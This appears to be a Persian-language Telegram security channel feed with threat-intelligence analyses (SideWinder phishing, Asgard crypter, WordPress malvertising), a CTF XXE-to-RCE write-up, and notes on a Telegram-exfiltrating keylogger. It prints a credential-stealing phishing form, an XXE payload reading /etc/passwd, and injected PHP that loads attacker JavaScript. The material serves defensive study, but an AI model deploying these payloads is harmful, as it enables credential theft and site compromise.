✅#GOLANG_Reverse_Engineering

مهندسی معکوس فایل‌های گولنگ با IDA

@NullError_ir

✅#obex

ابزاری برای مسدود کردن dll‌های ناخواسته موقع اجرای یه برنامه - ارزشمند برای نفوذگرها و رد‌ تیم‌ها

@NullError_ir

✅#APT_SideWinder

کمپین جدید SideWinder با هدف سرقت اطلاعات

گروه هکری (APT) SideWinder که یک گروه با حمایت دولتی و سابقه طولانی در عملیات‌های جاسوسی سایبری در جنوب آسیا شناخته می‌شود، اخیراً کمپین فیشینگ جدیدی را با استفاده از پورتال‌های جعلی سرویس‌های ایمیل Outlook و Zimbra آغاز کرده است. هدف اصلی این عملیات، سرقت اطلاعات ورود (Credentials) از اهداف حساس دولتی و نظامی است.

جزئیات فنی و تاکتیک‌های عملیاتی

1. زیرساخت حمله:

* مهاجمان برای میزبانی صفحات فیشینگ خود از پلتفرم‌های هاستینگ رایگان و معتبر مانند Netlify و pages.dev و workers.dev استفاده می‌کنند. این رویکرد دو مزیت کلیدی برای آن‌ها دارد:

* فرار از مکانیزم‌های دفاعی: با استفاده از سرویس‌های معتبر، مهاجمان به‌راحتی فیلترهای مبتنی بر reputaion دامنه را دور می‌زنند.

* سرعت عملیاتی بالا : این گروه قادر است به‌سرعت دامنه‌های فیشینگ خود را تغییر دهد. طبق گزارش، هر سه تا پنج روز یک سایت جدید ایجاد می‌شود که این موضوع شناسایی و مسدودسازی آن‌ها را دشوار می‌کند.

2. روش فریب و طعمه‌ها:

* این گروه از اسناد با مضامین دریایی و دفاعی به‌عنوان طعمه برای فریب قربانیان استفاده می‌کند.

* نمونه‌های مشخص:

* در بنگلادش، وب‌سایت اداره کل خریدهای دفاعی (DGDP) جعل شده و پورتال‌هایی با عنوان "Secured File" ایجاد گردیده که از قربانیان می‌خواهد برای دسترسی به جزئیات تجهیزات دفاعی ترکیه، اطلاعات ورود ایمیل خود را وارد کنند.

* در نپال، کارمندان وزارت دارایی ایمیل‌هایی حاوی یک فایل PDF فریبنده با عنوان सम्माननीय प्रधानमन्त्रीज्यूको चीन भ्रमण सम्बन्धमा.pdf (در خصوص سفر نخست‌وزیر محترم به چین) دریافت کرده‌اند که آن‌ها را به یک صفحه لاگین جعلی Outlook در بستر Netlify (با آدرس IP: 98.84.224.111 ) هدایت می‌کند.

3. مکانیزم سرقت اطلاعات:

* برخلاف بسیاری از حملات که متکی بر پی‌لودهای بدافزاری سمت کلاینت هستند، این کمپین مستقیماً از طریق فرم‌های HTML اطلاعات را جمع‌آوری می‌کند.

* یک فرم HTML ساده، اطلاعات وارد شده (نام کاربری و رمز عبور) را از طریق یک درخواست POST به سرور تحت کنترل مهاجم ارسال می‌کند. نمونه‌ای از این کد برای هدف قرار دادن SUPARCO (سازمان تحقیقات فضایی و جوی پاکستان) مشاهده شده است:

        <form method="POST" action="https://technologysupport.help/1pac.php">
          <input type="hidden" name="inbox" value="Y2hhaXJtYW5Ad2FwYXJjby5nb3YucGs=">
          <label for="email">Email:</label>
          <input type="email" id="email" name="user_email" required>
          <label for="pass">Password:</label>
          <input type="password" id="pass" name="user_pass" required>
          <button type="submit">Sign In</button>
        </form>
        

* تحلیل کد:

* یک فیلد مخفی (hidden ) با نام inbox در فرم وجود دارد که مقدار آن یک آدرس ایمیل رمزنگاری‌شده با Base64 است Y2hhaXJtYW5Ad2FwYXJjby5nb3YucGs= که معادل chairman@waparco.gov.pk است. این تکنیک به مهاجمان اجازه می‌دهد تا اطلاعات سرقت‌شده را با کمپین‌های خاص خود مرتبط سازند.

* اطلاعات مستقیماً به آدرس https://technologysupport.help/1pac.php ارسال می‌شود.

4. تکنیک‌های تکمیلی و پنهان‌سازی:

* در برخی موارد، از کدهای JavaScript برای افزایش پیچیدگی حمله استفاده می‌شود. برای مثال، آدرس ایمیل قربانی قبل از ارسال به صفحه فیشینگ ثانویه، با Base64 کدگذاری می‌شود. این کار هم به ردیابی نشست‌ها (Session Tracking) کمک می‌کند و هم تحلیل‌های سطحی و سریع را با چالش مواجه می‌سازد.

* پس از ارسال اطلاعات، ممکن است یک پیغام reload به کاربر نمایش داده شود تا در صورت ورود اطلاعات اشتباه، مجدداً آن‌ها را وارد کند.

اهداف و گستره جغرافیایی

این کمپین به‌طور خاص بر روی سازمان‌های دولتی و نظامی در کشورهای جنوب آسیا متمرکز است، از جمله:

* پاکستان
* نپال
* سریلانکا
* بنگلادش
* میانمار

مراحل پس از بهره‌برداری

اطلاعات سرقت‌شده در فرآیندهای جاسوسی گسترده‌تر این گروه مورد استفاده قرار می‌گیرد. این اطلاعات به SideWinder اجازه می‌دهد تا به شبکه‌های محدودشده دسترسی پیدا کند یا در مراحل بعدی، بدافزارهای خود را از دایرکتوری‌های باز روی سرورهای خود مانند IPهای 47.236.177.123 و 31.14.142.50 مستقر کند.


@NullError_ir

✅#CVE

جدیدترین CVEها به همراه اکسپلویت‌ها

#infosec #pentest #redteam #blueteam

@NullError_ir

🔤➕➕ ❌ 📺

✅#Anti_Screen

یک کد ساده برای جلوگیری از گرفته شدن اسکرین‌شات یا ضبط ویدیو از محتوای پنجره‌ی برنامه که البته کاربردهای دیگه‌ای هم داره :

1. پنهان‌سازی فعالیت بدافزار: یک بدافزار می‌تواند رابط کاربری خود (مثلاً یک پنجره‌ی تنظیمات یا یک فیشینگ پاپ‌آپ) را با این تکنیک محافظت کند. این کار تحلیلگران امنیتی را که از ابزارهای مبتنی بر اسکرین‌شات یا ضبط ویدیو برای مستندسازی و تحلیل رفتار بدافزار در محیط‌های سندباکس استفاده می‌کنند، با چالش مواجه می‌کند.

2. جلوگیری از گزارش‌گیری کاربر: اگر یک بدافزار یک پنجره‌ی جعلی برای دریافت اطلاعات حساس (مانند رمز عبور) نمایش دهد، استفاده از SetWindowDisplayAffinity می‌تواند مانع از این شود که کاربر به راحتی از آن پنجره اسکرین‌شات گرفته و برای تیم پشتیبانی یا امنیتی ارسال کند.

3. دور زدن سیستم‌های مانیتورینگ: برخی از سیستم‌های نظارت بر فعالیت کاربر (Employee Monitoring) یا ابزارهای (Parental Control) برای رصد فعالیت‌ها به صورت دوره‌ای اسکرین‌شات می‌گیرند. یک برنامه مخرب می‌تواند با این روش خود را از دید این سیستم‌ها پنهان کند.

@NullError_ir

✅#Keylogger

یک کیلاگر نوشته شده با Rust

درود به همه دوستان و اساتید . این سورس کد ساده بدافزار کیلاگر که با زبان برنامه‌نویسی Rust قبلا به عنوان نمونه نوشته بودم برای لینوکس هست که لاگ‌ها رو جمع آوری و به تلگرام میفرسته .

نکاتی داره برای آموزش و یادگیری و البته نقاط ضعفش رو هم نوشتم که بدونید و خودتون جهت یادگیری اصلاحش کنید . مثل :

مشخص بودن مقادیر ربات تلگرام (توکن و آی‌دی) در سورس کد.

ثبت شدن پیغام‌های خطا (eprintln!) در کد.

ثابت بودن مسیر دایرکتوری (/tmp/k-pro-logs) که به راحتی توسط ابزارهای مانیتورینگ فایل قابل شناسایی است.

🔠🔠🔠🔠

@NullError_ir

✅#CTF

چالش CTF Anonymous
زنجیره‌ای از آسیب‌پذیری‌ها تا اجرای کد از راه دور (RCE)

این چالش یک نمونه‌ی آموزشی عالی از چگونگی زنجیره‌ای کردن آسیب‌پذیری‌ها (Vulnerability Chaining) برای دستیابی به بالاترین سطح دسترسی در یک سیستم است. مهاجم با ترکیب هوشمندانه یک آسیب‌پذیری XML External Entity (XXE) با یک مکانیزم معیوب در بارگذاری فایل، موفق به اجرای کد از راه دور (RCE) می‌شود. در ادامه، هر مرحله با جزئیات فنی دقیق‌تر شکافته می‌شود.

مرحله اول: کشف و بهره‌برداری از آسیب‌پذیری XXE

حمله با یک آسیب‌پذیری کلاسیک اما همچنان بسیار خطرناک، یعنی XXE آغاز می‌شود.

۱. شناسایی نقطه ضعف

تحلیل کد جاوا اسکریپت در سمت کلاینت نشان می‌دهد که داده‌های فرم در قالب یک ساختار **XML به فایل notify.php ارسال می‌شوند. این الگو بلافاصله باید زنگ خطر را برای هر متخصص امنیتی به صدا درآورد. هرگاه یک برنامه ورودی کاربر را درون یک سند XML پردازش می‌کند، پتانسیل حمله XXE وجود دارد، مگر اینکه پردازنده XML به طور صریح و ایمن پیکربندی شده باشد.

کد جاوا اسکریپت تابعی را نشان می‌دهد که یک پیلود XML می‌سازد و آن را ارسال می‌کند. این ساختار به مهاجم اجازه می‌دهد تا کنترل کامل بر محتوای XML ارسالی داشته باشد.

۲. اثبات آسیب‌پذیری و استخراج اطلاعات

مهاجم با استفاده از ابزاری مانند cURL ، یک پیلود XML دستکاری‌شده را ارسال می‌کند. این پیلود شامل یک External Entity است که به یک فایل محلی روی سرور (/etc/passwd) اشاره می‌کند.

پیلود نمونه:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user>
  <name>&xxe;</name>
  <email>test@test.com</email>
  <message>test</message>
</user>

<!DOCTYPE user [...]> : این بخش یک Document Type Definition (DTD) را تعریف می‌کند.

<!ENTITY xxe SYSTEM "file:///etc/passwd"> : این قسمت یک موجودیت (Entity) به نام xxe تعریف می‌کند که محتوای آن از فایل /etc/passwd خوانده می‌شود.

&xxe; : در بدنه XML، با فراخوانی این موجودیت، پردازنده XML محتوای فایل را جایگزین آن کرده و در پاسخ به مهاجم برمی‌گرداند.

موفقیت در خواندن این فایل، آسیب‌پذیری In-Band XXE را تأیید می‌کند و نشان می‌دهد که مهاجم قابلیت خواندن فایل‌های دلخواه روی سیستم را با سطح دسترسی کاربر وب‌سرور (مثلاً www-data) دارد.

مرحله دوم: شناسایی میزبان مخفی و حرکت جانبی (Lateral Movement)

پس از به دست آوردن قابلیت خواندن فایل، مهاجم از این دسترسی برای فاز شناسایی (Enumeration) عمیق‌تر سیستم استفاده می‌کند.

۱. خواندن فایل‌های پیکربندی

یک هدف کلیدی در این مرحله، فایل‌های پیکربندی وب‌سرور است. در این مورد، فایل /etc/apache2/sites-enabled/000-default.conf حاوی اطلاعات ارزشمندی است. این فایل پیکربندی Virtual Hosts در آپاچی را تعریف می‌کند.

۲. کشف anonupload.cyberquest

محتوای این فایل یک میزبان (Host) جدید به نام anonupload.cyberquest را آشکار می‌کند که روی همان سرور و آدرس IP میزبانی می‌شود اما از طریق دامنه اصلی قابل دسترسی نیست. این یک تکنیک رایج برای پنهان کردن پنل‌های ادمین یا سرویس‌های داخلی است.

۳. دسترسی به میزبان جدید

مهاجم با افزودن رکورد زیر به فایل /etc/hosts سیستم محلی خود، به سیستم‌عامل خود می‌آموزد که چگونه دامنه anonupload.cyberquest را به آدرس IP سرور هدف ترجمه کند:
35.200.207.70 anonupload.cyberquest

این کار به او اجازه می‌دهد تا مستقیماً به وب‌سایت مخفی دسترسی پیدا کند، که در این مورد یک صفحه آپلود فایل محافظت‌شده با رمز عبور است.

مرحله سوم: دور زدن احراز هویت و تحلیل مکانیزم آپلود

مهاجم مجدداً از همان آسیب‌پذیری XXE، اما این بار برای یک هدف جدید، استفاده می‌کند: خواندن کد منبع صفحه آپلود.

۱. استخراج کد منبع و رمز عبور

با ارسال یک پیلود XXE برای خواندن فایل /var/www/anonupload.cyberquest/index.php ، مهاجم به کد PHP صفحه دسترسی پیدا می‌کند. تحلیل این کد، رمز عبور supersecret1234564_niceeeee132213 را که به صورت Hardcoded در کد قرار داده شده است، فاش می‌کند. این یک اشتباه امنیتی بسیار رایج و خطرناک است.

۲. ورود به پنل آپلود

پس از ورود، مهاجم با یک فرم آپلود فایل مواجه می‌شود که دارای چندین لایه امنیتی است. تحلیل این لایه‌ها کلید موفقیت در مرحله نهایی است.

مرحله چهارم: دور زدن پیچیده فیلتر آپلود فایل

این بخش جذاب‌ترین و فنی‌ترین قسمت چالش است و یک ضعف کلاسیک در منطق برنامه‌نویسی را به نمایش می‌گذارد.

✅#Mouse

استراق سمع مخفیانه از طریق موس‌های کامپیوتری

موس کامپیوتر شما گوش‌های بزرگی دارد


@NullError_ir

✅#OpenSSH

آسیب‌پذیری OpenSSH از طریق ProxyCommand برای اجرای کد از راه دور مورد بهره‌برداری قرار گرفت .

PoC Released

@NullError_ir

✅#Asgard

تحلیل Asgard

با تحلیل دقیق و مهندسی معکوس Asgard، محققان امنیتی به تکنیک‌های پیچیده آن برای دور زدن آنتی‌ویروس‌ها و ابزارهای تحلیلی پی برده‌اند. این Crypter که از اواخر سال ۲۰۲۳ در فروم‌های زیرزمینی تبلیغ شده، به دلیل قابلیت‌های پیشرفته در پنهان‌سازی و استقرار payloadهای مخرب، توجه مهاجمان سایبری را به خود جلب کرده است. در ادامه، جزئیات فنی و مکانیزم عملکرد این بدافزار به صورت کامل تشریح می‌شود

این Asgard Protector یک ابزار رمزکننده (Crypter) است که توسط مجرمان سایبری برای پنهان‌سازی و اجرای بدافزارهای دیگر مانند (RATs) و (Infostealers) استفاده می‌شود. این ابزار با بسته‌بندی payloadهای مخرب در قالب یک (installer) به ظاهر سالم، مکانیزم‌های دفاعی آنتی ویروس‌های سنتی را خنثی کرده و فرآیندهای تحلیل و پاسخ به حوادث را با چالش جدی مواجه می‌کند.

زنجیره آلودگی و مکانیزم عملکرد (Infection Chain)

عملکرد Asgard Protector چندمرحله‌ای و لایه‌لایه است تا شناسایی آن تا حد ممکن دشوار شود.

۱. مرحله اولیه: آرشیو خوداستخراج Nullsoft

بدافزار معمولاً در قالب یک فایل آرشیو خوداستخراج Nullsoft (Nullsoft Self-extracting Archive) توزیع می‌شود. پس از اجرا، این فایل چندین کامپوننت مخفی را در دایرکتوری موقت سیستم (%TEMP% ) استخراج (unpack) می‌کند.

۲. تکنیک‌های پنهان‌سازی اولیه

یکی از تکنیک‌های هوشمندانه در این مرحله، فریب از طریق پسوند فایل است. اسکریپت batch اصلی که وظیفه هدایت عملیات را بر عهده دارد، با پسوندی غیرمرتبط (مانند تغییر نام یک فایل .bat به Belgium.pst) ذخیره می‌شود تا از دید تحلیل‌گران و سیستم‌های امنیتی پنهان بماند. علاوه بر این، محتوای خود اسکریپت نیز به شدت مبهم‌سازی (Obfuscate) شده است.

۳. بازسازی مفسر AutoIt در حافظه
اسکریپت نصب‌کننده، به جای استفاده از یک فایل اجرایی کامل، قطعات یک مفسر AutoIt را از درون فایل‌های آرشیو CAB جاسازی‌شده استخراج کرده و آن را مستقیماً در حافظه (in-memory) بازسازی (reconstruct) می‌کند. این رویکرد از رها کردن یک فایل اجرایی کامل بر روی دیسک جلوگیری کرده و در نتیجه، از شناسایی مبتنی بر امضا (signature-based detection) فرار می‌کند.

۴. رمزگشایی و اجرای Payload نهایی

پس از بازسازی مفسر AutoIt، اسکریپت AutoIt جاسازی‌شده اجرا می‌شود که خود شامل لایه‌های حفاظتی بیشتری است:

* رمزگشایی در حافظه: Payload نهایی (بدافزار اصلی) به صورت رمزنگاری‌شده با الگوریتم RC4 درون اسکریپت ذخیره شده است و تنها در حافظه رم رمزگشایی می‌شود.

* فشرده‌سازی: پس از رمزگشایی، باینری با استفاده از الگوریتم LZNT1 از حالت فشرده خارج می‌شود.

* تزریق فرآیند (Process Injection): در نهایت، payload مخرب به درون یک فرآیند سیستمی معتبر مانند explorer.exe تزریق می‌شود. این کار باعث می‌شود که فعالیت بدافزار در زیر نقاب یک فرآیند قانونی پنهان شده و شناسایی آن در لیست فرآیندهای در حال اجرا بسیار دشوار گردد.

تکنیک‌های پیشرفته فرار از تحلیل

این Asgard Protector از مکانیزم‌های خاصی برای مقابله با محیط‌های تحلیل و سندباکس بهره می‌برد:

* شناسایی سندباکس مبتنی بر شبکه: یک تکنیک منحصربه‌فرد در این بدافزار، ارسال درخواست ping به یک دامنه که به صورت تصادفی تولید شده است، می‌باشد. اگر هرگونه پاسخی از این دامنه دریافت شود، بدافزار تشخیص می‌دهد که در یک محیط شبکه شبیه‌سازی‌شده یا مانیتور شده (مانند سندباکس) قرار دارد و بلافاصله اجرای خود را متوقف می‌کند تا از تحلیل شدن جلوگیری نماید.

* اجرای بدون فایل (Fileless Execution): ترکیب تکنیک‌های بازسازی در حافظه، رمزگشایی و تزریق فرآیند، به Asgard Protector اجازه می‌دهد تا بدون نوشتن فایل اجرایی نهایی بر روی دیسک، عملیات خود را تکمیل کند و از دید ابزارهای بازرسی مبتنی بر دیسک پنهان بماند.

مکانیزم پایداری (Persistence)

پس از اجرای موفقیت‌آمیز، بدافزار بسته به پیکربندی اپراتور، از یکی از روش‌های زیر برای اطمینان از اجرای مجدد خود پس از راه‌اندازی سیستم استفاده می‌کند:

* تغییر کلیدهای رجیستری Autorun: با افزودن ورودی‌های جدید به کلیدهای رجیستری مربوط به اجرای خودکار، بدافزار خود را در چرخه بوت سیستم‌عامل قرار می‌دهد.

* ایجاد وظایف زمان‌بندی‌شده (Scheduled Tasks): بدافزار یک وظیفه زمان‌بندی‌شده جدید در سیستم تعریف می‌کند تا در فواصل زمانی مشخص یا در رویدادهای خاصی مجدداً اجرا شود.

تحلیل عمیق اسکریپت بازسازی

اسکریپت .bat مبهم‌سازی‌شده از ترکیبی از دستورات خط فرمان ویندوز برای بازسازی باینری مفسر AutoIt استفاده می‌کند. قطعه کد زیر نمونه‌ای از این فرآیند است:

✅#WordPress

تحلیل کمپین Malvertising در وردپرس:
مهندسی معکوس تکنیک‌های پنهان‌سازی در functions.php

یک کمپین Malvertising (تبلیغات بدافزاری) پیچیده و در عین حال پنهان‌کار، وب‌سایت‌های وردپرسی را هدف قرار داده است. این کمپین با تزریق یک قطعه کد PHP به ظاهر بی‌خطر در فایل functions.php قالب فعال، کنترل کامل بر روی محتوای front-end وب‌سایت را به دست گرفته و بازدیدکنندگان را در معرض انواع تهدیدات، از جمله هدایت‌های اجباری (Forced Redirects) ، نمایش پاپ‌آپ‌های مخرب و بدافزارهای drive-by قرار می‌دهد.

فاز اول: شناسایی و نقطه نفوذ

حمله زمانی شناسایی شد که صاحبان وب‌سایت متوجه بارگذاری اسکریپت‌های جاوا اسکریپت مشکوک و ناخواسته‌ای شدند که هرگز توسط آن‌ها نصب نشده بود. بررسی سورس صفحه (View Page Source)، سرنخ اولیه را آشکار ساخت: یک تگ <noscript> که فایلی را از یک دامنه خارجی و ناشناس بارگذاری می‌کرد.

تحقیقات عمیق‌تر نشان داد که منشأ این تزریق، یک قطعه کد PHP است که به انتهای فایل functions.php قالب فعال وردپرس اضافه شده است. این فایل به دلیل نقش کلیدی در تعریف عملکردها و ویژگی‌های قالب، یک هدف ایده‌آل برای مهاجمان است.

بردار اصلی نفوذ در این کمپین، اغلب یکی از موارد زیر است:

* آسیب‌پذیری در افزونه‌ها یا قالب‌های قدیمی: مهاجمان با بهره‌برداری از یک آسیب‌پذیری شناخته‌شده، دسترسی لازم برای ویرایش فایل‌های قالب را به دست می‌آورند.

* اعتبارنامه‌های ضعیف یا سرقت‌شده: استفاده از رمزهای عبور ضعیف برای حساب مدیریت وردپرس، FTP یا کنترل پنل هاستینگ، مسیری مستقیم برای نفوذ فراهم می‌کند.

* مجوزهای دسترسی (Permissions) نادرست فایل‌ها: اگر فایل functions.php دارای مجوز نوشتن (writable) برای پروسس وب‌سرور باشد، بدافزارها می‌توانند به راحتی آن را ویرایش کنند.

فاز دوم: کالبدشکافی کد تزریق‌شده

کد تزریق‌شده در فایل functions.php به شکل زیر است. سادگی ظاهری این کد، قدرت پنهان‌کاری آن را افزایش می‌دهد:

// Injected PHP function in functions.php

function ti_custom_javanoscript() {
    $response = wp_remote_post(
     'https://brazilc.com/ads.php',
        array(
            'timeout' => 15,
            'body' => array('url' => home_url())
        )
    );
    if (!is_wp_error($response)) {
        echo wp_remote_retrieve_body($response);
    }
}

add_action('wp_head', 'ti_custom_javanoscript');

تحلیل دقیق عملکرد کد:

1۔ add_action('wp_head' , 'ti_custom_javanoscript'); : این خط، قلب مکانیزم حمله است. با استفاده از هوک (hook) وردپرسی wp_head ، تابع ti_custom_javanoscript در هر بار بارگذاری صفحه (page load) در تمام بخش‌های وب‌سایت، درست در داخل تگ <head> اجرا می‌شود. این تضمین می‌کند که کد مخرب قبل از هر اسکریپت دیگری بارگذاری و اجرا شود.

2۔ wp_remote_post(...) : این تابع وردپرسی یک درخواست HTTP POST به سرور فرماندهی و کنترل (C\&C) مهاجم به آدرس hxxps://brazilc[.]com/ads.php ارسال می‌کند. در بدنه (body) این درخواست، آدرس وب‌سایت آلوده (home_url()) نیز ارسال می‌شود که احتمالاً برای ردیابی قربانیان توسط مهاجمان استفاده می‌شود.

3۔ echo wp_remote_retrieve_body($response); : این بخش، حیاتی‌ترین قسمت است. پاسخ دریافت شده از سرور C\&C (که حاوی payload جاوا اسکریپت مخرب است) بدون هیچ‌گونه اعتبارسنجی یا پاک‌سازی، مستقیماً در خروجی HTML صفحه چاپ (echo) می‌شود. این تکنیک به مهاجم اجازه می‌دهد تا به صورت پویا و از راه دور، محتوای مخرب را در لحظه به مرورگر بازدیدکنندگان تزریق کند.

فاز سوم: تحلیل Payload جاوا اسکریپت

پاسخی که از سرور C\&C بازگردانده می‌شود، یک payload جاوا اسکریپت چندمرحله‌ای است که یک حمله دومرحله‌ای (Two-Pronged Attack) را اجرا می‌کند:

مرحله اول: سیستم توزیع ترافیک

اولین بخش از payload، اسکریپتی را از دامنه porsasystem[.]com (مشخصاً فایل 6m9x.js) بارگذاری می‌کند. این دامنه به عنوان یک سیستم توزیع ترافیک (TDS) عمل می‌کند. یک TDS، سرویسی است که بازدیدکنندگان را بر اساس پارامترهای مختلفی مانند موقعیت جغرافیایی، نوع سیستم‌عامل، مرورگر و... پروفایل کرده و سپس آن‌ها را به مخرب‌ترین یا سودآورترین مقصد بعدی هدایت می‌کند. این مقصد می‌تواند شامل موارد زیر باشد:

* صفحات فیشینگ

* سایت‌های تبلیغاتی مخرب

* کیت‌های بهره‌برداری (Exploit Kits)

* دانلود بدافزارهای دیگر (مانند باج‌افزار یا تروجان‌های بانکی)

این اسکریپت مسئول اصلی هدایت‌های ناخواسته و نمایش پاپ‌آپ‌هایی است که توسط کاربر گزارش شده است.

✅#Hidden_Text_Salting
آقای امید میرزائی محقق و سرپرست تیم امنیتی سیسکو تالوس خبر از کشف یک تکنیک فریبنده به نام "Hidden Text Salting" داد.

تحلیل تکنیک "Hidden Text Salting": سوءاستفاده از CSS برای فریب سیستم‌های امنیتی ایمیل

بر اساس گزارش ایشان، مهاجمان به طور فزاینده‌ای از یک تکنیک فریبنده به نام "Hidden Text Salting" برای دور زدن راهکارهای امنیتی ایمیل استفاده می‌کنند. این روش بر پایه سوءاستفاده از ویژگی‌های CSS (Cascading Style Sheets) برای تزریق و پنهان‌سازی محتوای بی‌ربط (که "Salt" یا "نمک" نامیده می‌شود) در بخش‌های مختلف ایمیل‌ها استوار است. هدف اصلی این تکنیک، مختل کردن و فریب دادن سیستم‌های تشخیص خودکار، از جمله الگوریتم‌های یادگیری ماشین و مدل‌های زبانی بزرگ (LLMs) است.

چرا مهاجمان از Hidden Text Salting استفاده می‌کنند؟

این تکنیک دو هدف اصلی را دنبال می‌کند:

1. فرار مستقیم از تشخیص (Direct Evasion): مهاجمان با افزودن محتوای بی‌ربط و تصادفی به بدنه ایمیل، امضاها (Signatures) و الگوهای متنی که توسط سیستم‌های امنیتی برای شناسایی ایمیل‌های مخرب استفاده می‌شوند را برهم می‌زنند. این کار تحلیل محتوای ایمیل را برای موتورهای تشخیص دشوارتر می‌کند.

2. اختلال در فرآیندهای جانبی (Indirect Evasion): این روش می‌تواند سایر بخش‌های خط لوله تحلیل امنیتی را نیز تحت تأثیر قرار دهد. برای مثال، با تزریق کلماتی از یک زبان دیگر (مانند فرانسوی در یک ایمیل انگلیسی)، می‌توانند ماژول‌های تشخیص زبان را به اشتباه بیندازند و باعث شوند فیلترهای اسپم مبتنی بر زبان، به درستی عمل نکنند.

محتوای "Salt" در کدام بخش‌های ایمیل تزریق می‌شود؟

تحقیقات نشان می‌دهد که مهاجمان عمدتاً در چهار بخش کلیدی ایمیل محتوای پنهان را جایگذاری می‌کنند:

1۔ Preheader: متن کوتاهی که در پیش‌نمایش اینباکس، بلافاصله بعد از عنوان ایمیل نمایش داده می‌شود. مهاجمان می‌توانند در این بخش، متون بی‌ربطی را با استفاده از CSS پنهان کنند تا موتورهای تحلیل را فریب دهند.

2۔ Header: بخش‌های بالایی ایمیل که کمتر متداول است اما همچنان به عنوان محلی برای تزریق محتوای پنهان استفاده می‌شود.

3۔ پیوست‌ها (Attachments): به خصوص در پیوست‌های HTML، مهاجمان کاراکترها یا کامنت‌های بی‌ربط را بین کدهای مهم (مانند رشته‌های Base64) قرار می‌دهند تا تحلیل استاتیک فایل را پیچیده و فرآیند استخراج URLهای مخرب را دشوار سازند.

4۔ بدنه ایمیل (Email Body): این متداول‌ترین محل برای تزریق Salt است. مهاجمان کاراکترهای پنهان را بین کلمات کلیدی (مانند نام برندها) قرار می‌دهند تا شناسایی آن‌ها توسط فیلترهای محتوا را مختل کنند.

انواع محتوای مورد استفاده به عنوان Salt

سه نوع محتوای اصلی برای این هدف به کار گرفته می‌شود:

1. کاراکترها (Characters): شامل کاراکترهای تصادفی که بین کلمات کلیدی قرار می‌گیرند یا کاراکترهای خاص با عرض صفر (Zero-Width) مانند ZWSP و ZWNJ که بین حروف یک برند (مانند Norton LifeLock) تزریق می‌شوند. این کاراکترها با چشم غیرمسلح دیده نمی‌شوند اما توسط پارسرهای ایمیل به عنوان بخشی از رشته متنی شناسایی می‌شوند.

2. پاراگراف‌ها (Paragraphs): جملات و عبارات کاملاً بی‌ربط (مثلاً به زبان آلمانی در یک ایمیل فیشینگ انگلیسی) که در بدنه ایمیل گنجانده شده و سپس با استفاده از CSS کاملاً پنهان می‌شوند.

3. کامنت‌ها (Comments): به ویژه در پیوست‌های HTML، کامنت‌های بی‌ربط زیادی بین کدهای JavaScript یا سایر بخش‌های کلیدی قرار داده می‌شود تا تحلیل استاتیک را دشوار کند.

تکنیک‌های رایج CSS برای پنهان‌سازی محتوا

مهاجمان از سه دسته اصلی ویژگی‌های CSS برای نامرئی کردن Salt سوءاستفاده می‌کنند:

1. ویژگی‌های متنی (Text Properties):

*۔ font-size: تنظیم اندازه فونت روی صفر یا یک مقدار بسیار کوچک.

*۔ color: تنظیم رنگ متن به همان رنگ پس‌زمینه (مثلاً سفید روی سفید).

2. ویژگی‌های نمایش و شفافیت (Visibility and Display Properties):

*۔ opacity: 0: المان را کاملاً شفاف و نامرئی می‌کند.

*۔ display: none: المان را به طور کامل از چیدمان صفحه حذف می‌کند.

*۔ visibility: hidden: المان را پنهان می‌کند اما فضای آن در چیدمان صفحه حفظ می‌شود.

3. ویژگی‌های اندازه و برش (Clipping and Sizing Properties):

*۔ width: 0 یا height: 0: عرض یا ارتفاع کانتینر حاوی متن Salt را صفر قرار می‌دهند.

*۔ overflow: hidden: محتوای اضافی یک کانتینر کوچک را پنهان می‌کنند. برای مثال، متن بزرگی را در یک دایره با شعاع صفر قرار داده و سرریز آن را مخفی می‌کنند.

شیوع این تکنیک در ایمیل‌های اسپم در مقابل ایمیل‌های قانونی

✅#APT35

💢 Iran-linked APT35

@NullError_ir

✅#Chaos

باج‌افزار Chaos سریع‌تر، هوشمندتر و خطرناک‌تر از قبل